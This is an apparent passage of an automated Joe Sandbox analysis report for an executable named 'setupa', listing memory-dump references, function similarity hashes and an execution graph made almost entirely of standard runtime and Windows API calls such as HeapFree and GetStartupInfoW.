                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThreadpool
                                                                                                              • String ID: CreateThreadpoolIo
                                                                                                              • API String ID: 480746585-1136547880
                                                                                                              • Opcode ID: d4643406f0524d469866e576b78123d847bffb9b8dde98583aef4692664e7d4f
                                                                                                              • Instruction ID: 5e29c33ee9633a6909e7bd7b9c059a9e12143dfce8a8ceecfce8a3a7a1b3f77b
                                                                                                              • Opcode Fuzzy Hash: d4643406f0524d469866e576b78123d847bffb9b8dde98583aef4692664e7d4f
                                                                                                              • Instruction Fuzzy Hash: 50F09661B19602D1FA20AF20F4153BA6390BF50FA2F40533DE56E861E6EF2CE189CB40
                                                                                                              Function 00007FF689647F04 Relevance: 5.0, APIs: 4, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1452528299-0
                                                                                                              • Opcode ID: 075d04a7dbc7dc2545d85e95e1d95e36f60cfa29a579a3b3127d162548ce2ec9
                                                                                                              • Instruction ID: cd4b071b57c15bc2c52ac16d51d9627523b7c856659e893fd858d2b43b12a5f6
                                                                                                              • Opcode Fuzzy Hash: 075d04a7dbc7dc2545d85e95e1d95e36f60cfa29a579a3b3127d162548ce2ec9
                                                                                                              • Instruction Fuzzy Hash: 2B112860F0C602C6FE649F62B81417D6291BF58FD2F68413DD91E977E5DE2CA881EB00

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:2.4%
                                                                                                              Total number of Nodes:945
                                                                                                              Total number of Limit Nodes:1
                                                                                                              execution_graph 6949 140adfcef3d 6954 140adfc5e60 6949->6954 6960 140adfc796c 6954->6960 6956 140adfc5e69 6957 140adfc5d40 6956->6957 7102 140adfc5c90 6957->7102 6959 140adfc5d59 6961 140adfc7981 _invalid_parameter_noinfo try_get_function 6960->6961 6963 140adfc799b _invalid_parameter_noinfo 6961->6963 6971 140adfc5e80 6961->6971 6963->6956 6964 140adfc79c9 _invalid_parameter_noinfo 6965 140adfc7a05 6964->6965 6966 140adfc79d7 _invalid_parameter_noinfo 6964->6966 6978 140adfc755c 6965->6978 6975 140adfc5ef8 6966->6975 6970 140adfc5ef8 __free_lconv_num HeapFree 6970->6963 6974 140adfc5e91 _invalid_parameter_noinfo 6971->6974 6972 140adfc5e60 _set_errno_from_matherr HeapFree 6973 140adfc5ee0 6972->6973 6973->6964 6974->6972 6974->6973 6976 140adfc5efd HeapFree 6975->6976 6977 140adfc5f18 try_get_function _set_errno_from_matherr __free_lconv_num 6975->6977 6976->6977 6977->6963 6979 140adfc760e _invalid_parameter_noinfo 6978->6979 6982 140adfc74b4 6979->6982 6981 140adfc7623 6981->6970 6983 140adfc74d0 6982->6983 6986 140adfc7744 6983->6986 6985 140adfc74e6 6985->6981 6987 140adfc778c Concurrency::details::SchedulerProxy::DeleteThis 6986->6987 6988 140adfc7760 Concurrency::details::SchedulerProxy::DeleteThis 6986->6988 6987->6985 6988->6987 6990 140adfcc2f8 6988->6990 6991 140adfcc394 6990->6991 6994 140adfcc31b 6990->6994 6992 140adfcc3e7 6991->6992 6995 140adfc5ef8 __free_lconv_num HeapFree 6991->6995 7056 140adfcc498 6992->7056 6994->6991 6996 140adfcc35a 6994->6996 7001 140adfc5ef8 __free_lconv_num HeapFree 6994->7001 6997 140adfcc3b8 6995->6997 6998 140adfcc37c 6996->6998 7004 140adfc5ef8 __free_lconv_num HeapFree 6996->7004 6999 140adfc5ef8 __free_lconv_num HeapFree 6997->6999 7000 140adfc5ef8 __free_lconv_num HeapFree 6998->7000 7002 140adfcc3cc 6999->7002 7006 140adfcc388 7000->7006 7007 140adfcc34e 7001->7007 7003 140adfc5ef8 __free_lconv_num HeapFree 7002->7003 7008 140adfcc3db 7003->7008 7009 140adfcc370 7004->7009 7005 140adfcc452 7010 140adfc5ef8 __free_lconv_num HeapFree 7006->7010 7016 140adfce0f0 7007->7016 7012 140adfc5ef8 __free_lconv_num HeapFree 7008->7012 7044 140adfce1fc 7009->7044 7010->6991 7012->6992 7014 140adfcc3f3 7014->7005 7015 140adfc5ef8 HeapFree __free_lconv_num 7014->7015 7015->7014 7017 140adfce0f9 7016->7017 7042 140adfce1f4 7016->7042 7018 140adfce113 7017->7018 7019 140adfc5ef8 __free_lconv_num HeapFree 7017->7019 7020 140adfce125 7018->7020 7021 140adfc5ef8 __free_lconv_num HeapFree 7018->7021 7019->7018 7022 140adfce137 7020->7022 7023 140adfc5ef8 __free_lconv_num HeapFree 7020->7023 7021->7020 7024 140adfce149 7022->7024 7025 140adfc5ef8 __free_lconv_num HeapFree 7022->7025 7023->7022 7026 140adfce15b 7024->7026 7027 140adfc5ef8 __free_lconv_num HeapFree 7024->7027 7025->7024 7028 140adfce16d 7026->7028 7029 140adfc5ef8 __free_lconv_num HeapFree 7026->7029 7027->7026 7030 140adfce17f 7028->7030 7031 140adfc5ef8 __free_lconv_num HeapFree 7028->7031 7029->7028 7032 140adfce191 7030->7032 7033 140adfc5ef8 __free_lconv_num HeapFree 7030->7033 7031->7030 7034 140adfce1a3 7032->7034 7035 140adfc5ef8 __free_lconv_num HeapFree 7032->7035 7033->7032 7036 140adfc5ef8 __free_lconv_num HeapFree 7034->7036 7038 140adfce1b5 7034->7038 7035->7034 7036->7038 7037 140adfce1ca 7039 140adfce1df 7037->7039 7041 140adfc5ef8 __free_lconv_num HeapFree 7037->7041 7038->7037 7040 140adfc5ef8 __free_lconv_num HeapFree 7038->7040 7039->7042 7043 140adfc5ef8 __free_lconv_num HeapFree 7039->7043 7040->7037 7041->7039 7042->6996 7043->7042 7046 140adfce201 7044->7046 7054 140adfce262 7044->7054 7045 140adfce21a 7048 140adfce22c 7045->7048 7049 140adfc5ef8 __free_lconv_num HeapFree 7045->7049 7046->7045 7047 140adfc5ef8 __free_lconv_num HeapFree 7046->7047 7047->7045 7050 140adfce23e 7048->7050 7051 140adfc5ef8 __free_lconv_num HeapFree 7048->7051 7049->7048 7052 140adfce250 7050->7052 7053 140adfc5ef8 __free_lconv_num HeapFree 7050->7053 7051->7050 7052->7054 7055 140adfc5ef8 __free_lconv_num HeapFree 7052->7055 7053->7052 7054->6998 7055->7054 7057 140adfcc4c8 7056->7057 7058 140adfcc49d 7056->7058 7057->7014 7058->7057 7062 140adfce2c0 7058->7062 7061 140adfc5ef8 __free_lconv_num HeapFree 7061->7057 7063 140adfce2c9 7062->7063 7064 140adfcc4c0 7062->7064 7098 140adfce268 7063->7098 7064->7061 7067 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7068 140adfce2f2 7067->7068 7069 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7068->7069 7070 140adfce300 7069->7070 7071 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7070->7071 7072 140adfce30e 7071->7072 7073 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7072->7073 7074 140adfce31d 7073->7074 7075 140adfc5ef8 __free_lconv_num HeapFree 7074->7075 7076 140adfce329 7075->7076 7077 140adfc5ef8 __free_lconv_num HeapFree 7076->7077 7078 140adfce335 7077->7078 7079 140adfc5ef8 __free_lconv_num HeapFree 7078->7079 7080 140adfce341 7079->7080 7081 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7080->7081 7082 140adfce34f 7081->7082 7083 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7082->7083 7084 140adfce35d 7083->7084 7085 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7084->7085 7086 140adfce36b 7085->7086 7087 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7086->7087 7088 140adfce379 7087->7088 7089 140adfce268 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7088->7089 7090 140adfce388 7089->7090 7091 140adfc5ef8 __free_lconv_num HeapFree 7090->7091 7092 140adfce394 7091->7092 7093 140adfc5ef8 __free_lconv_num HeapFree 7092->7093 7094 140adfce3a0 7093->7094 7095 140adfc5ef8 __free_lconv_num HeapFree 7094->7095 7096 140adfce3ac 7095->7096 7097 140adfc5ef8 __free_lconv_num HeapFree 7096->7097 7097->7064 7099 140adfce29c 7098->7099 7100 140adfce2b0 7098->7100 7099->7100 7101 140adfc5ef8 __free_lconv_num HeapFree 7099->7101 7100->7067 7101->7099 7103 140adfc796c _invalid_parameter_noinfo HeapFree 7102->7103 7104 140adfc5cb5 7103->7104 7105 140adfc5cc6 7104->7105 7106 140adfc5c90 _invalid_parameter_noinfo HeapFree 7104->7106 7105->6959 7107 140adfc5d59 7106->7107 7107->6959 7108 140adfc893c 7111 140adfc88c0 7108->7111 7110 140adfc8965 7112 140adfc88de 7111->7112 7113 140adfc8917 7112->7113 7115 140adfcc610 7112->7115 7113->7110 7116 140adfcc62f 7115->7116 7117 140adfcc622 Concurrency::details::SchedulerProxy::DeleteThis 7115->7117 7116->7112 7117->7116 7118 140adfcc2f8 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7117->7118 7118->7116 7517 140adfc16bc 7518 140adfc16dd 7517->7518 7519 140adfc16d8 7517->7519 7521 140adfc16fc 7519->7521 7522 140adfc171f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7521->7522 7523 140adfc1793 7521->7523 7522->7523 7523->7518 7657 140adfc7a38 7658 140adfc7a48 7657->7658 7659 140adfc796c _invalid_parameter_noinfo HeapFree 7658->7659 7660 140adfc7a53 __vcrt_uninitialize_ptd 7658->7660 7659->7660 7869 140adfc8d78 7870 140adfc8d9e 7869->7870 7871 140adfc8db4 7869->7871 7872 140adfc5e60 _set_errno_from_matherr HeapFree 7870->7872 7876 140adfc8e21 7871->7876 7885 140adfc8e14 7871->7885 7888 140adfc8f84 7871->7888 7873 140adfc8da3 7872->7873 7874 140adfc5d40 _invalid_parameter_noinfo HeapFree 7873->7874 7877 140adfc8dad 7874->7877 7875 140adfc4ebc HeapFree 7882 140adfc8e94 7875->7882 7876->7875 7878 140adfc8f09 7880 140adfc5ef8 __free_lconv_num HeapFree 7878->7880 7880->7885 7881 140adfc8f4a 7884 140adfc5ef8 __free_lconv_num HeapFree 7881->7884 7882->7878 7882->7882 7887 140adfc8f6c 7882->7887 7904 140adfce920 7882->7904 7883 140adfc5ef8 __free_lconv_num HeapFree 7883->7885 7884->7877 7885->7881 7885->7883 7889 140adfc8fb2 7888->7889 7889->7889 7890 140adfc5e80 _invalid_parameter_noinfo HeapFree 7889->7890 7891 140adfc8ffd 7890->7891 7892 140adfce920 HeapFree 7891->7892 7893 140adfc9033 7892->7893 7894 140adfc33d8 wprintf 9 API calls 7893->7894 7895 140adfc91e7 7894->7895 7913 140adfc8a74 7895->7913 7898 140adfc9298 7899 140adfc33d8 wprintf 9 API calls 7898->7899 7900 140adfc92cb 7899->7900 7934 140adfc8bec 7900->7934 7903 140adfc8f84 11 API calls 7908 140adfce938 7904->7908 7905 140adfce93d 7906 140adfce953 7905->7906 7907 140adfc5e60 _set_errno_from_matherr HeapFree 7905->7907 7906->7882 7909 140adfce947 7907->7909 7908->7905 7908->7906 7911 140adfce982 7908->7911 7910 140adfc5d40 _invalid_parameter_noinfo HeapFree 7909->7910 7910->7906 7911->7906 7912 140adfc5e60 _set_errno_from_matherr HeapFree 7911->7912 7912->7909 7914 140adfc8a9d 7913->7914 7915 140adfc8abf 7913->7915 7916 140adfc8aab FindFirstFileExW 7914->7916 7919 140adfc5ef8 __free_lconv_num HeapFree 7914->7919 7917 140adfc8b18 7915->7917 7918 140adfc8ac3 7915->7918 7916->7898 7920 140adfca170 wprintf MultiByteToWideChar 7917->7920 7918->7916 7921 140adfc8ad7 7918->7921 7923 140adfc5ef8 __free_lconv_num HeapFree 7918->7923 7919->7916 7924 140adfc8b33 7920->7924 7922 140adfc6d48 wprintf HeapFree 7921->7922 7922->7916 7923->7921 7925 140adfc8b67 7924->7925 7927 140adfc5ef8 __free_lconv_num HeapFree 7924->7927 7929 140adfc8b3a try_get_function 7924->7929 7931 140adfc8b73 7924->7931 7928 140adfc6d48 wprintf HeapFree 7925->7928 7926 140adfca170 wprintf MultiByteToWideChar 7926->7929 7927->7925 7928->7931 7929->7916 7930 140adfc5df0 wprintf HeapFree 7929->7930 7932 140adfc8b47 7930->7932 7931->7916 7931->7926 7933 140adfc5e60 _set_errno_from_matherr HeapFree 7932->7933 7933->7916 7935 140adfc8c15 7934->7935 7936 140adfc8c37 7934->7936 7939 140adfc5ef8 __free_lconv_num HeapFree 7935->7939 7942 140adfc8c23 7935->7942 7937 140adfc8c90 7936->7937 7940 140adfc8c3c 7936->7940 7938 140adfca1cc wprintf WideCharToMultiByte 7937->7938 7949 140adfc8cb4 7938->7949 7939->7942 7941 140adfc8c50 7940->7941 7940->7942 7944 140adfc5ef8 __free_lconv_num HeapFree 7940->7944 7945 140adfc6d48 wprintf HeapFree 7941->7945 7942->7903 7943 140adfc8cbb try_get_function 7943->7942 7950 140adfc5df0 wprintf HeapFree 7943->7950 7944->7941 7945->7942 7946 140adfc8cf6 7946->7942 7947 140adfca1cc wprintf WideCharToMultiByte 7946->7947 7947->7943 7948 140adfc8ceb 7952 140adfc6d48 wprintf HeapFree 7948->7952 7949->7943 7949->7946 7949->7948 7951 140adfc5ef8 __free_lconv_num HeapFree 7949->7951 7953 140adfc8cc8 7950->7953 7951->7948 7952->7946 7954 140adfc5e60 _set_errno_from_matherr HeapFree 7953->7954 7954->7942 7776 140adfce9f4 7777 140adfcea13 7776->7777 7778 140adfcea8c 7777->7778 7781 140adfcea23 7777->7781 7784 140adfd0ccc 7778->7784 7782 140adfd0ba0 _handle_error 4 API calls 7781->7782 7783 140adfcea82 7782->7783 7787 140adfd0ce0 IsProcessorFeaturePresent 7784->7787 7786 140adfcea91 7788 140adfd0cf6 7787->7788 7791 140adfd0d7c RtlCaptureContext RtlLookupFunctionEntry 7788->7791 7790 140adfd0d0a 7790->7786 7792 140adfd0dac RtlVirtualUnwind 7791->7792 7793 140adfd0dde 7791->7793 7792->7793 7793->7790 7524 140adfc18b0 7525 140adfc18d4 __scrt_acquire_startup_lock 7524->7525 7526 140adfc48d1 7525->7526 7527 140adfc796c _invalid_parameter_noinfo HeapFree 7525->7527 7528 140adfc48fa 7527->7528 7529 140adfc20b0 7530 140adfc20e0 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 7529->7530 7531 140adfc21d1 7530->7531 7532 140adfc219c RtlUnwindEx 7530->7532 7532->7530 7604 140adfc1870 7605 140adfc1879 7604->7605 7607 140adfc187d 7605->7607 7608 140adfc55d0 7605->7608 7609 140adfc796c _invalid_parameter_noinfo HeapFree 7608->7609 7610 140adfc55d9 7609->7610 7610->7607 7611 140adfc6a6c 7612 140adfc6a7c 7611->7612 7619 140adfcb9d8 7612->7619 7614 140adfc6a85 7615 140adfc6a93 7614->7615 7627 140adfc6870 GetStartupInfoW 7614->7627 7620 140adfcb9f7 7619->7620 7626 140adfcba20 7619->7626 7621 140adfc5e60 _set_errno_from_matherr HeapFree 7620->7621 7622 140adfcb9fc 7621->7622 7623 140adfc5d40 _invalid_parameter_noinfo HeapFree 7622->7623 7624 140adfcba08 7623->7624 7624->7614 7626->7624 7638 140adfcb8e0 7626->7638 7628 140adfc693f 7627->7628 7629 140adfc68a5 7627->7629 7633 140adfc6960 7628->7633 7629->7628 7630 140adfcb9d8 2 API calls 7629->7630 7631 140adfc68ce 7630->7631 7631->7628 7632 140adfc68f8 GetFileType 7631->7632 7632->7631 7635 140adfc697e 7633->7635 7634 140adfc6a51 7634->7615 7635->7634 7636 140adfc69d9 GetStdHandle 7635->7636 7636->7635 7637 140adfc69ec GetFileType 7636->7637 7637->7635 7639 140adfc5e80 _invalid_parameter_noinfo HeapFree 7638->7639 7643 140adfcb901 7639->7643 7640 140adfcb963 7641 140adfc5ef8 __free_lconv_num HeapFree 7640->7641 7642 140adfcb96d 7641->7642 7642->7626 7643->7640 7645 140adfc62c8 7643->7645 7646 140adfc62fe try_get_function 7645->7646 7647 140adfc6313 InitializeCriticalSectionAndSpinCount 7646->7647 7648 140adfc6308 7646->7648 7647->7648 7648->7643 7661 140adfc762c 7662 140adfc7646 7661->7662 7663 140adfc7631 7661->7663 7667 140adfc764c 7663->7667 7666 140adfc5ef8 __free_lconv_num HeapFree 7666->7662 7668 140adfc768e 7667->7668 7669 140adfc7696 7667->7669 7671 140adfc5ef8 __free_lconv_num HeapFree 7668->7671 7670 140adfc5ef8 __free_lconv_num HeapFree 7669->7670 7672 140adfc76a3 7670->7672 7671->7669 7673 140adfc5ef8 __free_lconv_num HeapFree 7672->7673 7674 140adfc76b0 7673->7674 7675 140adfc5ef8 __free_lconv_num HeapFree 7674->7675 7676 140adfc76bd 7675->7676 7677 140adfc5ef8 __free_lconv_num HeapFree 7676->7677 7678 140adfc76ca 7677->7678 7679 140adfc5ef8 __free_lconv_num HeapFree 7678->7679 7680 140adfc76d7 7679->7680 7681 140adfc5ef8 __free_lconv_num HeapFree 7680->7681 7682 140adfc76e4 7681->7682 7683 140adfc5ef8 __free_lconv_num HeapFree 7682->7683 7684 140adfc76f1 7683->7684 7685 140adfc5ef8 __free_lconv_num HeapFree 7684->7685 7686 140adfc7701 7685->7686 7687 140adfc5ef8 __free_lconv_num HeapFree 7686->7687 7688 140adfc7711 7687->7688 7693 140adfc74fc 7688->7693 7690 140adfc7726 7697 140adfc7474 7690->7697 7692 140adfc763e 7692->7666 7695 140adfc7518 7693->7695 7694 140adfc7548 7694->7690 7695->7694 7696 140adfc5ef8 __free_lconv_num HeapFree 7695->7696 7696->7694 7698 140adfc7490 7697->7698 7699 140adfc7744 Concurrency::details::SchedulerProxy::DeleteThis HeapFree 7698->7699 7700 140adfc749e 7699->7700 7700->7692 7955 140adfc896c 7956 140adfc8974 7955->7956 7957 140adfc62c8 InitializeCriticalSectionAndSpinCount 7956->7957 7958 140adfc89a5 7956->7958 7959 140adfc89a1 7956->7959 7957->7956 7961 140adfc89d0 7958->7961 7962 140adfc89fb 7961->7962 7963 140adfc89de DeleteCriticalSection 7962->7963 7964 140adfc89ff 7962->7964 7963->7962 7964->7959 7533 140adfc6aa8 7534 140adfc6ab4 7533->7534 7536 140adfc6adb 7534->7536 7537 140adfcb988 7534->7537 7538 140adfcb98d 7537->7538 7539 140adfcb9c8 7537->7539 7540 140adfcb9ae DeleteCriticalSection 7538->7540 7541 140adfcb9c0 7538->7541 7539->7534 7540->7540 7540->7541 7542 140adfc5ef8 __free_lconv_num HeapFree 7541->7542 7542->7539 7965 140adfc4b68 7966 140adfc4bcf 7965->7966 7967 140adfc4b85 GetModuleHandleW 7965->7967 7977 140adfc4a60 7966->7977 7967->7966 7972 140adfc4b92 7967->7972 7969 140adfc4c0b 7970 140adfc4c11 7969->7970 7981 140adfc4c24 7969->7981 7972->7966 7975 140adfc4c70 GetModuleHandleExW 7972->7975 7976 140adfc4c96 try_get_function __vcrt_uninitialize_winapi_thunks 7975->7976 7976->7966 7978 140adfc4a7c 7977->7978 7987 140adfc4a98 7978->7987 7980 140adfc4a85 7980->7969 7982 140adfc4c31 7981->7982 7983 140adfc4c5e 7982->7983 7984 140adfc4c4d GetCurrentProcess TerminateProcess 7982->7984 7985 140adfc4c70 GetModuleHandleExW 7983->7985 7984->7983 7986 140adfc4c65 ExitProcess 7985->7986 7988 140adfc4aae 7987->7988 7990 140adfc4b07 7987->7990 7988->7990 7991 140adfc5428 7988->7991 7990->7980 7994 140adfc52d4 7991->7994 7993 140adfc545d 7993->7990 7995 140adfc52f0 7994->7995 7998 140adfc5310 7995->7998 7997 140adfc52f9 7997->7993 7999 140adfc533e 7998->7999 8000 140adfc5336 7998->8000 7999->8000 8001 140adfc5ef8 __free_lconv_num HeapFree 7999->8001 8000->7997 8001->8000 8002 140adfca368 8003 140adfca38a 8002->8003 8006 140adfca3a7 8002->8006 8004 140adfca398 8003->8004 8003->8006 8005 140adfc5e60 _set_errno_from_matherr HeapFree 8004->8005 8008 140adfca39d __scrt_fastfail 8005->8008 8009 140adfcef70 8006->8009 8010 140adfcef8f 8009->8010 8011 140adfcef85 8009->8011 8013 140adfcef94 8010->8013 8019 140adfcef9b _invalid_parameter_noinfo 8010->8019 8012 140adfc6d48 wprintf HeapFree 8011->8012 8017 140adfcef8d 8012->8017 8014 140adfc5ef8 __free_lconv_num HeapFree 8013->8014 8014->8017 8015 140adfcefce HeapReAlloc 8015->8017 8015->8019 8016 140adfcefa1 8018 140adfc5e60 _set_errno_from_matherr HeapFree 8016->8018 8017->8008 8018->8017 8019->8015 8019->8016 7854 140adfcfda8 7855 140adfcfdbf 7854->7855 7856 140adfcfdb9 CloseHandle 7854->7856 7856->7855 7543 140adfc50a4 7544 140adfc50bd 7543->7544 7553 140adfc50b9 7543->7553 7545 140adfc9d84 17 API calls 7544->7545 7546 140adfc50c2 7545->7546 7555 140adfca264 GetEnvironmentStringsW 7546->7555 7549 140adfc50cf 7552 140adfc5ef8 __free_lconv_num HeapFree 7549->7552 7552->7553 7554 140adfc5ef8 __free_lconv_num HeapFree 7554->7549 7559 140adfca292 7555->7559 7566 140adfca334 7555->7566 7556 140adfca33e FreeEnvironmentStringsW 7557 140adfc50c7 7556->7557 7557->7549 7567 140adfc5110 7557->7567 7558 140adfca1cc wprintf WideCharToMultiByte 7560 140adfca2e4 7558->7560 7559->7558 7560->7566 7582 140adfc6d48 7560->7582 7563 140adfca31d 7565 140adfc5ef8 __free_lconv_num HeapFree 7563->7565 7564 140adfca1cc wprintf WideCharToMultiByte 7564->7563 7565->7566 7566->7556 7566->7557 7568 140adfc5137 7567->7568 7569 140adfc5e80 _invalid_parameter_noinfo HeapFree 7568->7569 7579 140adfc516c 7569->7579 7570 140adfc51db 7571 140adfc5ef8 __free_lconv_num HeapFree 7570->7571 7572 140adfc50dc 7571->7572 7572->7554 7573 140adfc5e80 _invalid_parameter_noinfo HeapFree 7573->7579 7574 140adfc51cc 7575 140adfc5218 HeapFree 7574->7575 7577 140adfc51d4 7575->7577 7578 140adfc5ef8 __free_lconv_num HeapFree 7577->7578 7578->7570 7579->7570 7579->7573 7579->7574 7580 140adfc5203 7579->7580 7581 140adfc5ef8 __free_lconv_num HeapFree 7579->7581 7586 140adfc5670 7579->7586 7581->7579 7585 140adfc6d57 _invalid_parameter_noinfo 7582->7585 7583 140adfc5e60 _set_errno_from_matherr HeapFree 7584 140adfc6d91 7583->7584 7584->7563 7584->7564 7585->7583 7585->7584 7587 140adfc5687 7586->7587 7589 140adfc567d 7586->7589 7588 140adfc5e60 _set_errno_from_matherr HeapFree 7587->7588 7590 140adfc568e 7588->7590 7589->7587 7593 140adfc56a2 7589->7593 7591 140adfc5d40 _invalid_parameter_noinfo HeapFree 7590->7591 7592 140adfc569a 7591->7592 7592->7579 7593->7592 7594 140adfc5e60 _set_errno_from_matherr HeapFree 7593->7594 7594->7590 7701 140adfc1824 7702 140adfc182d __scrt_acquire_startup_lock 7701->7702 7704 140adfc1831 7702->7704 7705 140adfc4f1c 7702->7705 7706 140adfc4f3c 7705->7706 7735 140adfc4f53 7705->7735 7707 140adfc4f5a 7706->7707 7708 140adfc4f44 7706->7708 7710 140adfc9d84 17 API calls 7707->7710 7709 140adfc5e60 _set_errno_from_matherr HeapFree 7708->7709 7711 140adfc4f49 7709->7711 7712 140adfc4f5f 7710->7712 7713 140adfc5d40 _invalid_parameter_noinfo HeapFree 7711->7713 7736 140adfc9538 GetModuleFileNameW 7712->7736 7713->7735 7720 140adfc4fe9 7723 140adfc4cf8 9 API calls 7720->7723 7721 140adfc4fd1 7722 140adfc5e60 _set_errno_from_matherr HeapFree 7721->7722 7724 140adfc4fd6 7722->7724 7725 140adfc5005 7723->7725 7726 140adfc5ef8 __free_lconv_num HeapFree 7724->7726 7728 140adfc5037 7725->7728 7729 140adfc5050 7725->7729 7734 140adfc500b 7725->7734 7726->7735 7727 140adfc5ef8 __free_lconv_num HeapFree 7727->7735 7730 140adfc5ef8 __free_lconv_num HeapFree 7728->7730 7732 140adfc5ef8 __free_lconv_num HeapFree 7729->7732 7731 140adfc5040 7730->7731 7733 140adfc5ef8 __free_lconv_num HeapFree 7731->7733 7732->7734 7733->7735 7734->7727 7735->7704 7737 140adfc957e try_get_function 7736->7737 7738 140adfc9592 7736->7738 7741 140adfc5df0 wprintf HeapFree 7737->7741 7739 140adfc33d8 wprintf 9 API calls 7738->7739 7740 140adfc95c0 7739->7740 7758 140adfc9424 7740->7758 7742 140adfc958b 7741->7742 7744 140adfd0ba0 _handle_error 4 API calls 7742->7744 7745 140adfc4f76 7744->7745 7746 140adfc4cf8 7745->7746 7748 140adfc4d36 7746->7748 7750 140adfc4d9c 7748->7750 7771 140adfca134 7748->7771 7749 140adfc4e8f 7752 140adfc4ebc 7749->7752 7750->7749 7751 140adfca134 9 API calls 7750->7751 7751->7750 7753 140adfc4ed4 7752->7753 7754 140adfc4f0c 7752->7754 7753->7754 7755 140adfc5e80 _invalid_parameter_noinfo HeapFree 7753->7755 7754->7720 7754->7721 7756 140adfc4f02 7755->7756 7757 140adfc5ef8 __free_lconv_num HeapFree 7756->7757 7757->7754 7759 140adfc9461 7758->7759 7766 140adfc9448 7758->7766 7760 140adfca1cc wprintf WideCharToMultiByte 7759->7760 7764 140adfc9466 7759->7764 7761 140adfc94b9 7760->7761 7762 140adfc94c0 try_get_function 7761->7762 7761->7764 7765 140adfc94e9 7761->7765 7762->7766 7768 140adfc5df0 wprintf HeapFree 7762->7768 7763 140adfc5e60 _set_errno_from_matherr HeapFree 7763->7766 7764->7763 7764->7766 7767 140adfca1cc wprintf WideCharToMultiByte 7765->7767 7766->7742 7767->7762 7769 140adfc94cd 7768->7769 7770 140adfc5e60 _set_errno_from_matherr HeapFree 7769->7770 7770->7766 7772 140adfca0bc 7771->7772 7773 140adfc33d8 wprintf 9 API calls 7772->7773 7774 140adfca0e0 7773->7774 7774->7748 7649 140adfc2467 7652 140adfc563c 7649->7652 7653 140adfc77f0 wprintf 9 API calls 7652->7653 7654 140adfc5645 7653->7654 7655 140adfc5aa0 wprintf 9 API calls 7654->7655 7656 140adfc565b 7655->7656 7119 140adfc5520 7120 140adfc5551 7119->7120 7121 140adfc5539 7119->7121 7121->7120 7122 140adfc5ef8 